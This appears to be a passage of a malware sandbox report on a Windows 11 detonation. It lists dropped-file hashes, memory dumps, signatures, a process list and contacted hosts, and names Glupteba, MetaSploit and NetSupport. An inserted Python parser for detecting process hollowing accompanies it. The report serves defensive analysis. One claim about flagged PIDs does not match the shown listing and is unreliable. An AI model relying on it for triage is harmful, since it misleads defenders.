| SHA512 | 577a92cb503a8de18b18c296b8617f7bcce9bf032a480cda529b2a0b0247cb5fcc165d54bd7cab9eeb5c4a3e7a64f172ccb39b1d0b9d12e1cc2f9e353eb1086f |
memory/1968-317-0x0000000005B60000-0x0000000005B61000-memory.dmp
memory/1968-316-0x0000000005B50000-0x0000000005B51000-memory.dmp
C:\Users\Admin\Documents\m63bk7jXXCHYPXwc1lnnDPZY.exe
| MD5 | 038bd2ee88ff4c4990fc6328229b7702 |
| SHA1 | 7c80698a230be3c6733ded3ee7622fe356c3cb7d |
| SHA256 | a9963528ae516477d9441d7ed9e9b28ea33c055661a8cafa4b6d541e14317e7e |
| SHA512 | 6dac9efbecbd525129ce56d9f0f620e101afca8e91e23c48b6f377711d3a9b97fac1d38f8de8c57b73e309b57ebaac7bf152b207c166c0a6ce3eac2b49cac03e |
memory/1968-310-0x0000000005B40000-0x0000000005B41000-memory.dmp
memory/4044-307-0x0000000000000000-mapping.dmp
memory/1968-306-0x0000000005B30000-0x0000000005B31000-memory.dmp
memory/1968-302-0x0000000005B20000-0x0000000005B21000-memory.dmp
memory/4164-304-0x0000000000000000-mapping.dmp
memory/1968-301-0x0000000005B10000-0x0000000005B11000-memory.dmp
memory/4996-330-0x0000000000000000-mapping.dmp
memory/4496-329-0x0000000000000000-mapping.dmp
memory/1420-328-0x0000000000000000-mapping.dmp
memory/2364-326-0x0000000000000000-mapping.dmp
memory/2380-327-0x0000000000000000-mapping.dmp
memory/3724-342-0x0000000000000000-mapping.dmp
memory/4476-341-0x0000000000000000-mapping.dmp
memory/4900-340-0x0000000000000000-mapping.dmp
memory/2852-339-0x0000000000000000-mapping.dmp
memory/3060-338-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\36H0x_pEZxGQ648xkMBepoMB.exe
| MD5 | e4deef56f8949378a1c650126cc4368b |
| SHA1 | cc62381e09d237d1bee1f956d7a051e1cc23dc1f |
| SHA256 | fd9d10b2598d0e12b25bf26410a0396667901fb8150085650b8415d58ccdb8ac |
| SHA512 | d84bbb39c05503ba428600ced4342ed77db6437ea142af33e34374691f055020b845152382d0516cf105e3379d6d20fa1c204c2799773f3a559bdbc38e0a9ffd |
C:\Users\Admin\Documents\_mOR0RAfOsExG638NCtHjm6B.exe
| MD5 | c7ccbd62c259a382501ff67408594011 |
| SHA1 | c1dca912e6c63e3730f261a3b4ba86dec0acd5f3 |
| SHA256 | 8cfa7e9bc6cbd458cec18a25e6f763a3776802490e6b3d451d864c4dba50c437 |
| SHA512 | 5f5958363820795f96fff6ad71bc1b59ec01a6a24876c5d22d48efaa49bc55373fca1f8e927c23547cdb494ba46b6d3871f377e607c97d9f10d4e0636ac7ef2b |
C:\Users\Admin\Documents\qV5dvKCOf3jbI4p4wHoY7HtS.exe
| MD5 | 44c355ae8cc3ecc4a95b5716fb9635fd |
| SHA1 | f4d46438cad6fac2be4fb08cf6972a8306e5e12a |
| SHA256 | f77f16151eb30569f7f1276063f67100c6ad439fde9d07605c5ae5e0c9eb8b7d |
| SHA512 | 46ab10861ff330796bd7e60c71e474ebb7a44d2000eea9d56c4fcc27d6b1e1c643996c91d6261f107aa5b86b3bbaf38c23be4705a6fcc3a587bd9d7422c7f259 |
C:\Users\Admin\Documents\jKLSPhadj6e2QQLlPuXVqGnE.exe
| MD5 | 6eab2a9353bf7254d1d583489d8317e2 |
| SHA1 | 553754576adb15c7a2a4d270b2a2689732002165 |
| SHA256 | 4aefb36ac35b1cc94895ea4459cc8e51e88a9fa8e957b94617d66a2c841e182b |
| SHA512 | 9c5a4f15794418adcce63246fdba9209fe6a9df25d5044e93de8f80e68e92e246db82bb66c3ac5f4815c81570df9588caa63b8d4099e07e9da840754f71ca569 |
memory/3120-332-0x0000000002850000-0x0000000002866000-memory.dmp
C:\Users\Admin\Documents\3vLa7ArANMnSow_dFvTpjPtT.exe
| MD5 | a84a527c4444287e412b4ab44bc63c9c |
| SHA1 | f1319320c69c6bfc4e7e6d82783b0bd6da19d053 |
| SHA256 | 5f482c3724bfbe5e7b934e2e48dcc2026ab35667d960a1c9ba3779165f594916 |
| SHA512 | a87ee15748adb35c49796a7a7e717aafecccfd1f3916f3f15cd350efc4945daee6930d53f5e072e05d169d302fa1c9bde5d4cb61289bfb56f09e9512efe2bbf4 |
memory/4900-354-0x0000000001040000-0x0000000001050000-memory.dmp
C:\Users\Admin\Documents\oYP9zRm_dNH8VgV3gPUOmB9X.exe
| MD5 | 94c78c311f499024a9f97cfdbb073623 |
| SHA1 | 50e91d3eaa06d2183bf8c6c411947304421c5626 |
| SHA256 | 6aef62b3b8890bc22dd99f9b0d48247ae52c69e7ad9e384332658e73c725e40e |
| SHA512 | 29b61f1924f19d073460332950c2316acf769aa40ad7f62a41941160cd8a8da5958e8f96183e0e498afe8558fc3efb3a23f66c7519c142c780c91279ddecb545 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\m63bk7jXXCHYPXwc1lnnDPZY.exe.log
| MD5 | 40e179d3fb083a63386724041717ebf4 |
| SHA1 | 17b514f6e9e91755e00356fa833a5b5ffc0ec02d |
| SHA256 | e1f7a550509d618fd4fc44e69b899c403b2b7ad7c0f86f35c2118e2eadcdc399 |
| SHA512 | df14d16342e1678439de2c8e9bd5b4a3cd64eb767e4e7378d120f1660f9a49b7177abf60d77a73e180718889054a60174fcb518cacee2066245b869441dd4202 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\B6Wxfafbpe4OIYb1e2r7Evf1.exe.log
| MD5 | e07da89fc7e325db9d25e845e27027a8 |
| SHA1 | 4b6a03bcdb46f325984cbbb6302ff79f33637e19 |
| SHA256 | 94ab73c00494d10a2159175b81e23047621451e3a566e5a0b1222379db634aaf |
| SHA512 | 1e33e34595ebb6ce129d0244199d29722c916c036da542c3001f84b10a964b96cec7a9fdd19e120d7840614b307b504be993a4f8538d54382aa4944575476dda |
memory/4900-366-0x0000000001330000-0x0000000001342000-memory.dmp
C:\Users\Admin\Documents\RZD4oho8I4zDqCNSUS5wG0QB.exe
| MD5 | 7c34cf01cf220a4caf2feaee9a187b77 |
| SHA1 | 700230ccddb77c860b718aee7765d25847c52cbf |
| SHA256 | bbfe7a85b5e34c8b000529b0bac402a6d225ffd0eb2ffdad120326a34e4b7608 |
| SHA512 | b2c24c363ce8bdda92c4def2afa57995cf0ed7b0feda1082a979f14edc73b87ce171adcf337dd85a9b5b5daaa90471a65a3f7506a02da3af92e2e7b56451baa3 |
C:\Users\Admin\Documents\eLCkNwHAgOHnUjHUl5w4wbkB.exe
| MD5 | a6ef5e293c9422d9a4838178aea19c50 |
| SHA1 | 93b6d38cc9376fa8710d2df61ae591e449e71b85 |
| SHA256 | 94ae283f87d31de4b9ae3344c469239be735621cd7546e95dfa70afa028507a0 |
| SHA512 | b5a999ca504efb49bcb209dcc1791dd77eded67f798590deb25a545009c2ad7577c8edc376b0f6c26140f82ecb5196b0a821be0cede6cdf65938ee174bfd4454 |
C:\Users\Admin\Documents\FlfGkKyliXtbVPnQShveCOZZ.exe
| MD5 | be5ac1debc50077d6c314867ea3129af |
| SHA1 | 2de0add69b7742fe3e844f940464a9f965b6e68f |
| SHA256 | 577643f523646cd00dedf577aeb5848405cc29518cabb4dec9ca6bcb316f9abd |
| SHA512 | 7ff22965ddce1830fbf9b05bcf19da894378f73d423c591d45397d952729ee1d0d816fd2e87e91269f6969849ecb94ab8b86f3933fd723a9e2cdea024958c324 |
memory/4676-365-0x0000000000000000-mapping.dmp
memory/4472-348-0x0000000000000000-mapping.dmp
memory/1420-384-0x0000000002E40000-0x0000000002E6F000-memory.dmp
memory/4164-388-0x00000000052C0000-0x00000000058D8000-memory.dmp
memory/4996-392-0x0000000004E70000-0x0000000005416000-memory.dmp
memory/2364-397-0x0000000004D00000-0x0000000004D01000-memory.dmp
memory/8-401-0x0000000000000000-mapping.dmp
memory/1952-407-0x0000000000000000-mapping.dmp
memory/4656-409-0x0000000000000000-mapping.dmp
memory/4044-406-0x0000000000AD0000-0x0000000000AD1000-memory.dmp
memory/2912-419-0x00000000008C0000-0x00000000008C3000-memory.dmp
memory/3148-417-0x0000000005920000-0x0000000005921000-memory.dmp
memory/3540-415-0x0000000000000000-mapping.dmp
memory/2912-412-0x0000000000000000-mapping.dmp
memory/4496-429-0x0000000002540000-0x000000000256F000-memory.dmp
memory/4840-436-0x0000000000000000-mapping.dmp
memory/1992-439-0x0000000000000000-mapping.dmp
memory/1704-431-0x000000001B6D2000-0x000000001B6D4000-memory.dmp
memory/1740-434-0x0000000000000000-mapping.dmp
memory/4484-428-0x0000000000000000-mapping.dmp
memory/1704-446-0x000000001B6D4000-0x000000001B6D5000-memory.dmp
memory/4476-460-0x0000000003FF0000-0x000000000408D000-memory.dmp
memory/5368-459-0x0000000000000000-mapping.dmp
memory/2852-465-0x0000000005D30000-0x0000000005D31000-memory.dmp
memory/4164-462-0x000000007F020000-0x000000007F021000-memory.dmp
memory/3060-456-0x00000000040B0000-0x00000000040E0000-memory.dmp
memory/5528-477-0x0000000000000000-mapping.dmp
memory/1740-482-0x00000000050C0000-0x00000000056D8000-memory.dmp
memory/4472-485-0x0000000005E20000-0x0000000005E21000-memory.dmp
memory/5692-481-0x0000000000000000-mapping.dmp
memory/3540-487-0x000001D98B9E0000-0x000001D98BA4F000-memory.dmp
memory/3540-490-0x000001D98BA50000-0x000001D98BB1F000-memory.dmp
memory/5840-492-0x0000000000000000-mapping.dmp
memory/5988-497-0x0000000000000000-mapping.dmp
memory/5856-493-0x0000000000000000-mapping.dmp
memory/5856-506-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2244-508-0x0000000000000000-mapping.dmp
memory/8-500-0x00000000042C0000-0x00000000043C5000-memory.dmp
memory/6028-503-0x0000000000000000-mapping.dmp
memory/2244-514-0x0000000000700000-0x0000000000701000-memory.dmp
memory/2244-516-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/2244-518-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/2244-520-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/5840-519-0x00000000029B0000-0x00000000029B1000-memory.dmp
memory/2244-521-0x0000000005A80000-0x0000000005A81000-memory.dmp
memory/2232-535-0x0000000000000000-mapping.dmp
memory/4632-554-0x0000000000000000-mapping.dmp
memory/4048-555-0x0000000000000000-mapping.dmp
memory/1516-552-0x0000000000000000-mapping.dmp
memory/1832-551-0x0000000000000000-mapping.dmp
memory/3604-558-0x0000000000000000-mapping.dmp
memory/1520-568-0x0000000000000000-mapping.dmp
memory/832-567-0x0000000000000000-mapping.dmp
memory/3940-565-0x0000000000000000-mapping.dmp
memory/3880-562-0x0000000000000000-mapping.dmp
memory/4696-561-0x0000000000000000-mapping.dmp
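The listing above mixes dropped-file records (a path followed by hash rows) with memory-dump artifact names, and lists some files more than once because the same content was written again. The parser below is an added example, not part of the sandbox report or its tooling. It turns the listing into records keyed by SHA256, rejects any digest whose length does not match its algorithm, decodes each memory dump name into PID, sequence number and address range, and applies a heuristic of this example's own (not a report signature): a PID that has a fresh process-mapping snapshot plus a small dumped region at the 0x400000 image base is flagged as worth checking for a hollowed or injected payload. The sample input is a constructed excerpt of the lines above.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Optional

# Added example, not part of the sandbox report. The input format is taken from
# the page: a dropped-file path on its own line, then "| MD5 | ... |" hash rows,
# with memory-dump artifact names interleaved.
MEM_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)-"
    r"(?:0x(?P<end>[0-9A-Fa-f]+)-memory|mapping)\.dmp$"
)
HASH_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}  # hex digits per algorithm

@dataclass
class DroppedFile:
    sha256: str
    hashes: dict                                 # algorithm -> lowercase hex digest
    paths: list = field(default_factory=list)    # every path this content was written to

@dataclass
class MemRegion:
    pid: int
    seq: int                                     # sandbox event sequence number
    start: int
    end: Optional[int]                           # None for a "-mapping.dmp" process snapshot

    @property
    def size(self) -> Optional[int]:
        return None if self.end is None else self.end - self.start

def parse_files_section(text: str):
    """Return ({sha256: DroppedFile}, {pid: [MemRegion, ...]})."""
    files, regions, pending = {}, defaultdict(list), None

    def flush():                                 # finish the file entry being read, if any
        nonlocal pending
        if pending is None:
            return
        path, hashes = pending
        pending = None
        for alg, digest in hashes.items():       # a truncated digest is useless as an IoC
            if len(digest) != HASH_LEN[alg]:
                raise ValueError(f"{path}: {alg} has {len(digest)} hex digits, want {HASH_LEN[alg]}")
        if "SHA256" not in hashes:
            raise ValueError(f"{path}: no SHA256 row")
        rec = files.setdefault(hashes["SHA256"], DroppedFile(hashes["SHA256"], hashes))
        if path not in rec.paths:                # same content written again: one record
            rec.paths.append(path)

    for line in filter(None, map(str.strip, text.splitlines())):
        m = MEM_RE.match(line)
        if m:
            flush()
            end = int(m["end"], 16) if m["end"] else None
            regions[int(m["pid"])].append(MemRegion(int(m["pid"]), int(m["seq"]), int(m["start"], 16), end))
            continue
        h = HASH_RE.match(line)
        if h:
            if pending is None:
                raise ValueError(f"hash row without a preceding path: {line}")
            pending[1][h[1]] = h[2].lower()
            continue
        flush()                                  # anything else starts a new file entry
        pending = (line, {})
    flush()
    return files, dict(regions)

def hollowing_candidates(regions, image_base=0x400000, max_size=0x100000):
    """Heuristic of this example, not a report signature: a PID with a process-creation
    mapping snapshot and a small dumped region at the classic 32-bit image base is
    worth checking for a hollowed or injected payload."""
    hits = []
    for pid, regs in sorted(regions.items()):
        fresh = any(r.end is None for r in regs)
        small_image = any(r.start == image_base and r.size is not None and r.size <= max_size for r in regs)
        if fresh and small_image:
            hits.append(pid)
    return hits

# Constructed excerpt of the listing above (same lines; one entry repeated as on the page).
SAMPLE = r"""
C:\Users\Admin\Documents\3wpzV7LHpsW8SeHdznOlDVhr.exe
| MD5 | 58f5dca577a49a38ea439b3dc7b5f8d6 |
| SHA1 | 175dc7a597935b1afeb8705bd3d7a556649b06cf |
| SHA256 | 857dd46102aea53f0cb7934b96410ebbc3e7988d38dcafdc8c0988f436533b98 |
| SHA512 | 3c75c0cbbbc14bd25b4feb141fd1595ce02469da50432fb48400eb089d6150fe87831ccc775d921eeec697af7aad33a35fadcfd2ec775aeee1ce34355af7338a |
C:\Users\Admin\Documents\3wpzV7LHpsW8SeHdznOlDVhr.exe
| MD5 | 58f5dca577a49a38ea439b3dc7b5f8d6 |
| SHA1 | 175dc7a597935b1afeb8705bd3d7a556649b06cf |
| SHA256 | 857dd46102aea53f0cb7934b96410ebbc3e7988d38dcafdc8c0988f436533b98 |
| SHA512 | 3c75c0cbbbc14bd25b4feb141fd1595ce02469da50432fb48400eb089d6150fe87831ccc775d921eeec697af7aad33a35fadcfd2ec775aeee1ce34355af7338a |
memory/1968-218-0x0000000000000000-mapping.dmp
memory/2240-208-0x0000000000000000-mapping.dmp
memory/2240-213-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1148-216-0x0000000005050000-0x00000000055F6000-memory.dmp
"""
```

On the excerpt the two identical entries collapse to one record with one path, PID 1968 is not flagged (it has a snapshot but no 0x400000 region) and PID 2240 is. Fed the full listing above, the same pattern recurs for PIDs 2240, 2672, 3672, 4164 and 5856, each of which has a mapping snapshot followed by a region of 0x9000 to 0x20000 bytes at 0x400000; that is consistent with the SetThreadContext, UnmapMainImage and WriteProcessMemory signatures in the summary, and those dumps are the ones to carve for the injected payloads.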
Analysis: behavioral1
Detonation Overview
| Field | Value |
| Submitted | 2021-08-22 20:10 |
| Reported | 2021-08-22 20:41 |
| Platform | win11 |
| Max time kernel | 586s |
| Max time network | 1594s |
| Command Line | |
Signatures
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4584 created 4624 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (13).exe |
Note: the acting process here is Windows Error Reporting. WerFault.exe was started with -pss -s 448 -p 4624 -ip 4624 (see Processes below) to handle the crash of the sample, PID 4624, and the -pss switch makes it take a process snapshot of the faulting process. That snapshot is what trips this other-parent-process heuristic and the two WriteProcessMemory entries further down; neither is injection by the sample.
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (13).exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
Note: every entry in this table comes from C:\Windows\System32\sihclient.exe (a Windows Update component) or svchost.exe, not from the sample. The empty Certificates, CRLs and CTLs containers under \REGISTRY\USER\.DEFAULT\...\SystemCertificates are what CryptoAPI creates when a SYSTEM service opens the per-user certificate stores, and the MuiCache and Internet Settings keys under S-1-5-19 are LocalService housekeeping. This is distinct from the "Modifies system certificate store" detection in the summary, which is not raised in this run.
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4584 wrote to memory of 4624 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (13).exe |
| PID 4584 wrote to memory of 4624 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (13).exe |
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\Setup (13).exe | "C:\Users\Admin\AppData\Local\Temp\Setup (13).exe" |
| C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc |
| C:\Windows\System32\sihclient.exe | C:\Windows\System32\sihclient.exe /cv R3q930x020WnyfI9gsy3Ow.0.2 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4624 -ip 4624 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 1560 |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV |
Network
| Country | Destination | Domain | Proto |
| N/A | 51.124.78.146:443 | tcp | |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 131.253.33.203:80 | oneocsp.microsoft.com | tcp |
| N/A | 23.217.250.58:80 | go.microsoft.com | tcp |
| N/A | 20.189.173.14:443 | tcp | |
| N/A | 20.189.118.208:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | tcp | |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 40.125.122.151:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | tcp | |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 127.0.0.1:5985 | N/A | tcp |
Files
memory/4184-146-0x000001A24DB60000-0x000001A24DB70000-memory.dmp
memory/4184-147-0x000001A24DBE0000-0x000001A24DBF0000-memory.dmp
memory/4184-148-0x000001A24DF70000-0x000001A24DF74000-memory.dmp
memory/4184-149-0x000001A250460000-0x000001A250464000-memory.dmp
memory/4184-150-0x000001A250420000-0x000001A250421000-memory.dmp
memory/4184-151-0x000001A24DFA0000-0x000001A24DFA4000-memory.dmp
memory/4184-152-0x000001A24DF90000-0x000001A24DF91000-memory.dmp
memory/4184-153-0x000001A24DF90000-0x000001A24DF94000-memory.dmp
memory/4184-154-0x000001A24DE70000-0x000001A24DE71000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2021-08-22 20:10
Reported
2021-08-22 20:41
Platform
win11
Max time kernel
207s
Max time network
1817s
Command Line
Signatures
Glupteba
Glupteba Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
